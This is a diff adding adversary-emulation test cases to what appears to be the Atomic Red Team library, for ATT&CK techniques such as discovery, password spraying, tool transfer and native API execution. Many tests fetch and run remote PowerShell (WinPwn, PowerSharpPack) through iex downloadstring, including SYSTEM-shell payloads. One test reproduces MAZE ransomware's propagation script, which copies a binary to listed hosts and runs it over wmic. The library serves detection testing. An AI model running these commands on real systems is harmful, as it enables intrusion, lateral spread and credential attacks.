+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #19 - WinPwn - RBCD-Check
+Search for Resource-Based Constrained Delegation attack paths using RBCD-Check function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** dec6a0d8-bcaf-4c22-9d48-2aee59fb692b
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+RBCD-Check -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #20 - WinPwn - PowerSharpPack - Watson searching for missing windows patches
+PowerSharpPack - Watson searching for missing windows patches  technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 07b18a66-6304-47d2-bad0-ef421eb2e107
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
+Invoke-watson
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #21 - WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors
+PowerSharpPack - Sharpup checking common Privesc vectors technique via function of WinPwn - Takes several minutes to complete.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** efb79454-1101-4224-a4d0-30c9c8b29ffc
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
+Invoke-SharpUp -command "audit"
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #22 - WinPwn - PowerSharpPack - Seatbelt
+PowerSharpPack - Seatbelt technique via function of WinPwn.
+
+[Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5c16ceb4-ba3a-43d7-b848-a13c1f216d95
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
+Invoke-Seatbelt -Command "-group=all"; pause
+```
+
+
+
+
+
+
 <br/>

atomics/T1082/T1082.yaml

@@ -156,3 +156,121 @@ atomic_tests:
     command: |
       csrutil status
     name: sh
+- name: WinPwn - winPEAS
+  auto_generated_guid: eea1d918-825e-47dd-acc2-814d6c58c0e1
+  description:  Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      winPEAS -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - itm4nprivesc
+  auto_generated_guid: 3d256a2f-5e57-4003-8eb6-64d91b1da7ce
+  description:  Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      itm4nprivesc -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - Powersploits privesc checks
+  auto_generated_guid: 345cb8e4-d2de-4011-a580-619cf5a9e2d7
+  description:  Powersploits privesc checks using oldchecks function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      oldchecks -noninteractive -consoleoutput
+    cleanup_command: |-
+      rm -force -recurse .\DomainRecon -ErrorAction Ignore
+      rm -force -recurse .\Exploitation -ErrorAction Ignore
+      rm -force -recurse .\LocalPrivEsc -ErrorAction Ignore
+      rm -force -recurse .\LocalRecon -ErrorAction Ignore
+      rm -force -recurse .\Vulnerabilities -ErrorAction Ignore
+    name: powershell
+- name: WinPwn - General privesc checks
+  auto_generated_guid: 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed
+  description:  General privesc checks using the otherchecks function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      otherchecks -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - GeneralRecon
+  auto_generated_guid: 7804659b-fdbf-4cf6-b06a-c03e758590e8
+  description: Collect general computer informations via GeneralRecon function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      Generalrecon -consoleoutput -noninteractive
+    name: powershell
+- name: WinPwn - Morerecon
+  auto_generated_guid: 3278b2f6-f733-4875-9ef4-bfed34244f0a
+  description: Gathers local system information using the Morerecon function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      Morerecon -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - RBCD-Check
+  auto_generated_guid: dec6a0d8-bcaf-4c22-9d48-2aee59fb692b
+  description: Search for Resource-Based Constrained Delegation attack paths using RBCD-Check function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      RBCD-Check -consoleoutput -noninteractive
+    name: powershell
+
+- name: WinPwn - PowerSharpPack - Watson searching for missing windows patches 
+  auto_generated_guid: 07b18a66-6304-47d2-bad0-ef421eb2e107
+  description: PowerSharpPack - Watson searching for missing windows patches  technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
+      Invoke-watson
+    name: powershell
+- name: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors
+  auto_generated_guid: efb79454-1101-4224-a4d0-30c9c8b29ffc
+  description: PowerSharpPack - Sharpup checking common Privesc vectors technique via function of WinPwn - Takes several minutes to complete.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
+      Invoke-SharpUp -command "audit"
+    name: powershell
+    
+- name: WinPwn - PowerSharpPack - Seatbelt 
+  auto_generated_guid: 5c16ceb4-ba3a-43d7-b848-a13c1f216d95
+  description: |-
+    PowerSharpPack - Seatbelt technique via function of WinPwn.
+    
+    [Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
+      Invoke-Seatbelt -Command "-group=all"; pause
+    name: powershell

atomics/T1087.002/T1087.002.md

@@ -34,6 +34,8 @@ Commands such as <code>net user /domain</code> and <code>net group /domain</code
 
 - [Atomic Test #14 - Enumerate Root Domain linked policies Discovery](#atomic-test-14---enumerate-root-domain-linked-policies-discovery)
 
+- [Atomic Test #15 - WinPwn - generaldomaininfo](#atomic-test-15---winpwn---generaldomaininfo)
+
 
 <br/>
 
@@ -568,4 +570,34 @@ Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-direct
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #15 - WinPwn - generaldomaininfo
+Gathers general domain information using the generaldomaininfo function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ce483c35-c74b-45a7-a670-631d1e69db3d
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+generaldomaininfo -noninteractive -consoleoutput
+```
+
+
+
+
+
+
 <br/>

atomics/T1087.002/T1087.002.yaml

@@ -265,3 +265,14 @@ atomic_tests:
     elevation_required: false
     command: |
       (([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
+- name: WinPwn - generaldomaininfo
+  auto_generated_guid: ce483c35-c74b-45a7-a670-631d1e69db3d
+  description: Gathers general domain information using the generaldomaininfo function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      generaldomaininfo -noninteractive -consoleoutput
+    name: powershell

atomics/T1105/T1105.md

@@ -44,6 +44,10 @@
 
 - [Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download](#atomic-test-20---download-a-file-with-microsoft-connection-manager-auto-download)
 
+- [Atomic Test #21 - MAZE Propagation Script](#atomic-test-21---maze-propagation-script)
+
+- [Atomic Test #22 - Printer Migration Command-Line Tool UNC share folder into a zip file](#atomic-test-22---printer-migration-command-line-tool-unc-share-folder-into-a-zip-file)
+
 
 <br/>
 
@@ -884,4 +888,120 @@ rmdir /s/q %temp%\T1105 >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #21 - MAZE Propagation Script
+This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. 
+Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.
+Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| binary_file | Binary file to copy to remote machines | string | $env:comspec|
+| exe_remote_folder | Path to store executable on remote machine (no drive letter) | String | &#92;Windows&#92;Temp&#92;T1105.exe|
+| remote_drive_letter | Remote drive letter | String | C|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$machine_list = "$env:temp\T1105MachineList.txt"
+$offline_list = "$env:temp\T1105OfflineHosts.txt"
+$completed_list = "$env:temp\T1105CompletedHosts.txt"
+foreach ($machine in get-content -path "$machine_list")
+{if (test-connection -Count 1 -computername $machine -quiet) 
+{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
+echo $machine >> "$completed_list"
+wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
+else
+{echo $machine >> "$offline_list"}}
+```
+
+#### Cleanup Commands:
+```powershell
+if (test-path "$env:temp\T1105CompletedHosts.txt") 
+{foreach ($machine in get-content -path "$env:temp\T1105CompletedHosts.txt")
+{wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
+Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
+Remove-Item -path "$env:temp\T1105OfflineHosts.txt" -erroraction silentlycontinue
+Remove-item -path "$env:temp\T1105CompletedHosts.txt" -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Binary file must exist at specified location (#{binary_file})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{binary_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+write-host "The binary_file input parameter must be set to a binary that exists on this computer."
+```
+##### Description: Machine list must exist at specified location ("$env:temp\T1105MachineList.txt")
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "$env:temp\T1105MachineList.txt") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+new-item -path "$env:temp\T1105MachineList.txt"
+echo "A machine list file has been generated at "$env:temp\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #22 - Printer Migration Command-Line Tool UNC share folder into a zip file
+Create a ZIP file from a folder in a remote drive
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 49845fc1-7961-4590-a0f0-3dbcf065ae7e
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| Path_unc | Path to the UNC folder | Path | &#92;&#92;127.0.0.1&#92;c$&#92;AtomicRedTeam&#92;atomics&#92;T1105&#92;src&#92;|
+| Path_PrintBrm | Path to PrintBrm.exe | Path | C:&#92;Windows&#92;System32&#92;spool&#92;tools&#92;PrintBrm.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+del %TEMP%\PrintBrm.zip >nul 2>&1 
+#{Path_PrintBrm} -b -d #{Path_unc}  -f %TEMP%\PrintBrm.zip -O FORCE
+```
+
+#### Cleanup Commands:
+```cmd
+del %TEMP%\PrintBrm.zip >nul 2>&1
+```
+
+
+
+
+
 <br/>

atomics/T1105/T1105.yaml

@@ -553,3 +553,83 @@ atomic_tests:
       del /f/s/q %temp%\T1105 >nul 2>&1
       rmdir /s/q %temp%\T1105 >nul 2>&1
     name: command_prompt
+
+- name: MAZE Propagation Script
+  auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf
+  description: |
+    This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. 
+    Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.
+    Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html 
+  supported_platforms:
+  - windows
+  input_arguments:
+    binary_file:
+      description: Binary file to copy to remote machines
+      type: string
+      default: $env:comspec
+    exe_remote_folder:
+      description: Path to store executable on remote machine (no drive letter)
+      type: String
+      default: \Windows\Temp\T1105.exe
+    remote_drive_letter:
+      description: Remote drive letter
+      type: String
+      default: C
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Binary file must exist at specified location (#{binary_file})
+    prereq_command: |
+      if (Test-Path #{binary_file}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      write-host "The binary_file input parameter must be set to a binary that exists on this computer."
+  - description: |
+      Machine list must exist at specified location ("$env:temp\T1105MachineList.txt")
+    prereq_command: |
+      if (Test-Path "$env:temp\T1105MachineList.txt") {exit 0} else {exit 1}
+    get_prereq_command: |
+      new-item -path "$env:temp\T1105MachineList.txt"
+      echo "A machine list file has been generated at "$env:temp\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
+  executor:
+    command: |
+      $machine_list = "$env:temp\T1105MachineList.txt"
+      $offline_list = "$env:temp\T1105OfflineHosts.txt"
+      $completed_list = "$env:temp\T1105CompletedHosts.txt"
+      foreach ($machine in get-content -path "$machine_list")
+      {if (test-connection -Count 1 -computername $machine -quiet) 
+      {cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
+      echo $machine >> "$completed_list"
+      wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
+      else
+      {echo $machine >> "$offline_list"}}
+    cleanup_command: |
+      if (test-path "$env:temp\T1105CompletedHosts.txt") 
+      {foreach ($machine in get-content -path "$env:temp\T1105CompletedHosts.txt")
+      {wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
+      Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
+      Remove-Item -path "$env:temp\T1105OfflineHosts.txt" -erroraction silentlycontinue
+      Remove-item -path "$env:temp\T1105CompletedHosts.txt" -erroraction silentlycontinue
+    name: powershell
+
+- name: Printer Migration Command-Line Tool UNC share folder into a zip file
+  auto_generated_guid: 49845fc1-7961-4590-a0f0-3dbcf065ae7e
+  description: |
+    Create a ZIP file from a folder in a remote drive
+  supported_platforms:
+    - windows
+  input_arguments:
+    Path_unc:
+      description: Path to the UNC folder
+      type: Path
+      default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\
+    Path_PrintBrm:
+      description: Path to PrintBrm.exe
+      type: Path
+      default: C:\Windows\System32\spool\tools\PrintBrm.exe
+  executor:
+    command: |
+      del %TEMP%\PrintBrm.zip >nul 2>&1 
+      #{Path_PrintBrm} -b -d #{Path_unc}  -f %TEMP%\PrintBrm.zip -O FORCE
+    cleanup_command: |
+      del %TEMP%\PrintBrm.zip >nul 2>&1
+    name: command_prompt

atomics/T1106/T1106.md

@@ -12,6 +12,12 @@ Adversaries may abuse these OS API functions as a means of executing behaviors.
 
 - [Atomic Test #1 - Execution through API - CreateProcess](#atomic-test-1---execution-through-api---createprocess)
 
+- [Atomic Test #2 - WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique](#atomic-test-2---winpwn---get-system-shell---pop-system-shell-using-createprocess-technique)
+
+- [Atomic Test #3 - WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique](#atomic-test-3---winpwn---get-system-shell---bind-system-shell-using-createprocess-technique)
+
+- [Atomic Test #4 - WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique](#atomic-test-4---winpwn---get-system-shell---pop-system-shell-using-namedpipe-impersonation-technique)
+
 
 <br/>
 
@@ -47,4 +53,88 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /tar
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique
+Get SYSTEM shell - Pop System Shell using CreateProcess technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ce4e76e6-de70-4392-9efe-b281fc2b4087
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique
+Get SYSTEM shell - Bind System Shell using CreateProcess technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7ec5b74e-8289-4ff2-a162-b6f286a33abd
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique
+Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e1f93a06-1649-4f07-89a8-f57279a7d60e
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')
+```
+
+
+
+
+
+
 <br/>

atomics/T1106/T1106.yaml

@@ -20,4 +20,30 @@ atomic_tests:
       C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe #{source_file}
       %tmp%/T1106.exe
     name: command_prompt
-
+- name: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique
+  auto_generated_guid: ce4e76e6-de70-4392-9efe-b281fc2b4087
+  description: Get SYSTEM shell - Pop System Shell using CreateProcess technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')
+    name: powershell
+- name: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique
+  auto_generated_guid: 7ec5b74e-8289-4ff2-a162-b6f286a33abd
+  description: Get SYSTEM shell - Bind System Shell using CreateProcess technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')
+    name: powershell
+- name: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique
+  auto_generated_guid: e1f93a06-1649-4f07-89a8-f57279a7d60e
+  description: Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')
+    name: powershell

atomics/T1110.003/T1110.003.md

@@ -31,6 +31,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
 
 - [Atomic Test #4 - Password spray all Azure AD users with a single password](#atomic-test-4---password-spray-all-azure-ad-users-with-a-single-password)
 
+- [Atomic Test #5 - WinPwn - DomainPasswordSpray Attacks](#atomic-test-5---winpwn---domainpasswordspray-attacks)
+
 
 <br/>
 
@@ -247,4 +249,34 @@ Install-Module -Name AzureAD -Force
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - WinPwn - DomainPasswordSpray Attacks
+DomainPasswordSpray Attacks technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+domainpassspray -consoleoutput -noninteractive -emptypasswords
+```
+
+
+
+
+
+
 <br/>

atomics/T1110.003/T1110.003.yaml

@@ -157,3 +157,14 @@ atomic_tests:
         }
       }
       Write-Host "End of password spraying"
+- name: WinPwn - DomainPasswordSpray Attacks
+  auto_generated_guid: 5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82
+  description: DomainPasswordSpray Attacks technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      domainpassspray -consoleoutput -noninteractive -emptypasswords
+    name: powershell

atomics/T1120/T1120.md

@@ -6,6 +6,8 @@
 
 - [Atomic Test #1 - Win32_PnPEntity Hardware Inventory](#atomic-test-1---win32_pnpentity-hardware-inventory)
 
+- [Atomic Test #2 - WinPwn - printercheck](#atomic-test-2---winpwn---printercheck)
+
 
 <br/>
 
@@ -40,4 +42,34 @@ Remove-Item $env:TEMP\T1120_collection.txt -ErrorAction Ignore
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - WinPwn - printercheck
+Search for printers / potential vulns using printercheck function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cb6e76ca-861e-4a7f-be08-564caa3e6f75
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+printercheck -noninteractive -consoleoutput
+```
+
+
+
+
+
+
 <br/>

atomics/T1120/T1120.yaml

@@ -13,3 +13,14 @@ atomic_tests:
       @($Heading; $Break; $Data |Sort-Object -Unique) | ? {$_.trim() -ne "" } |Set-Content $env:TEMP\T1120_collection.txt
     cleanup_command: Remove-Item $env:TEMP\T1120_collection.txt -ErrorAction Ignore
     name: powershell
+- name: WinPwn - printercheck
+  auto_generated_guid: cb6e76ca-861e-4a7f-be08-564caa3e6f75
+  description: Search for printers / potential vulns using printercheck function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      printercheck -noninteractive -consoleoutput
+    name: powershell

atomics/T1127/T1127.md

@@ -0,0 +1,123 @@
+# T1127 - Trusted Developer Utilities Proxy Execution
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1127)
+<blockquote>Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Lolbin Jsc.exe compile javascript to exe](#atomic-test-1---lolbin-jscexe-compile-javascript-to-exe)
+
+- [Atomic Test #2 - Lolbin Jsc.exe compile javascript to dll](#atomic-test-2---lolbin-jscexe-compile-javascript-to-dll)
+
+
+<br/>
+
+## Atomic Test #1 - Lolbin Jsc.exe compile javascript to exe
+Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
+https://lolbas-project.github.io/lolbas/Binaries/Jsc/
+https://www.phpied.com/make-your-javascript-a-windows-exe/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| filename | Location of the project file | Path | PathToAtomicsFolder&#92;T1127&#92;src&#92;hello.js|
+| jscpath | Default location of jsc.exe | Path | C:&#92;Windows&#92;Microsoft.NET&#92;Framework&#92;v4.0.30319|
+| jscname | Default name of jsc | Path | jsc.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+copy #{filename} %TEMP%\hello.js
+#{jscpath}\#{jscname} %TEMP%\hello.js
+```
+
+#### Cleanup Commands:
+```cmd
+del %TEMP%\hello.js
+del %TEMP%\hello.exe
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: JavaScript code file must exist on disk at specified location (#{filename})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{filename}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
